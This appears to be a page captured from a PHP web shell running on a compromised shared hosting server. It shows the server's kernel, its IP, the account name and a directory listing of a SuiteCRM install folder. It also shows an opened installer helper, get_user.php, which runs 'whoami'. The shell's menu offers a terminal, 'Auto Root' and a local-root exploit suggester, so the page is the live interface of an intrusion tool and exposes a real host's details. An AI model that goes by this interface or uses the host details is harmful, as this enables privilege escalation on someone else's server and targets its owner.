Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.206
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
suitecrm7 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
php53
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
php56
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
php71
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
php81
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
php82
[ DIR ]
drwxr-xr-x
2024-11-06 17:54
_.htaccess
3.97
KB
-rw-r--r--
2023-11-23 11:31
clone.php
16.44
KB
-rw-r--r--
2024-11-06 12:38
config.php
11.58
KB
-rw-r--r--
2024-11-06 12:05
config_override.php
132
B
-rw-r--r--
2024-11-06 12:05
edit.php
4.68
KB
-rw-r--r--
2024-11-06 12:38
edit.xml
433
B
-rw-r--r--
2023-11-23 11:31
extend.php
10
KB
-rw-r--r--
2024-11-06 12:38
fileindex.php
673
B
-rw-r--r--
2023-11-23 11:31
get_user.php
947
B
-rw-r--r--
2023-11-23 11:31
import.php
3.33
KB
-rw-r--r--
2024-11-06 12:38
info.xml
3.55
KB
-rw-r--r--
2024-11-06 12:05
install.js
924
B
-rw-r--r--
2023-11-23 11:31
install.php
11.07
KB
-rw-r--r--
2024-11-06 12:38
install.xml
1.12
KB
-rw-r--r--
2024-02-07 07:59
md5
1.58
KB
-rw-r--r--
2024-11-06 12:38
notes.txt
1.11
KB
-rw-r--r--
2023-11-23 11:31
status.json
305
B
-rw-r--r--
2023-11-23 11:31
suitecrm7.sql
340.76
KB
-rw-r--r--
2024-11-06 12:05
suitecrm7.zip
56.7
MB
-rw-r--r--
2024-11-06 12:05
update_pass.php
558
B
-rw-r--r--
2023-11-23 11:31
Save
Rename
<?php @unlink('get_user.php'); function __getRunningUser(){ // works on Windows and Linux, but might return null on systems that include "exec" in // disabled_functions in php.ini (typical in shared hosting) $runningUser = exec('whoami'); if ($runningUser == null) { // matches null, false and "" if (__is_windows()) { $runningUser = getenv('USERDOMAIN').'\\'.getenv('USERNAME'); } elseif (function_exists('posix_getpwuid') && function_exists('posix_geteuid')) { $usr = posix_getpwuid(posix_geteuid()); $runningUser = $usr['name']; } } return ($runningUser == null) ? '' : $runningUser; } function __is_windows(){ static $is_windows = null; if (!isset($is_windows)) { $is_windows = strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'; } return $is_windows; } $cronUser = __getRunningUser(); echo '<get_user>'.$cronUser.'</get_user>'; ?>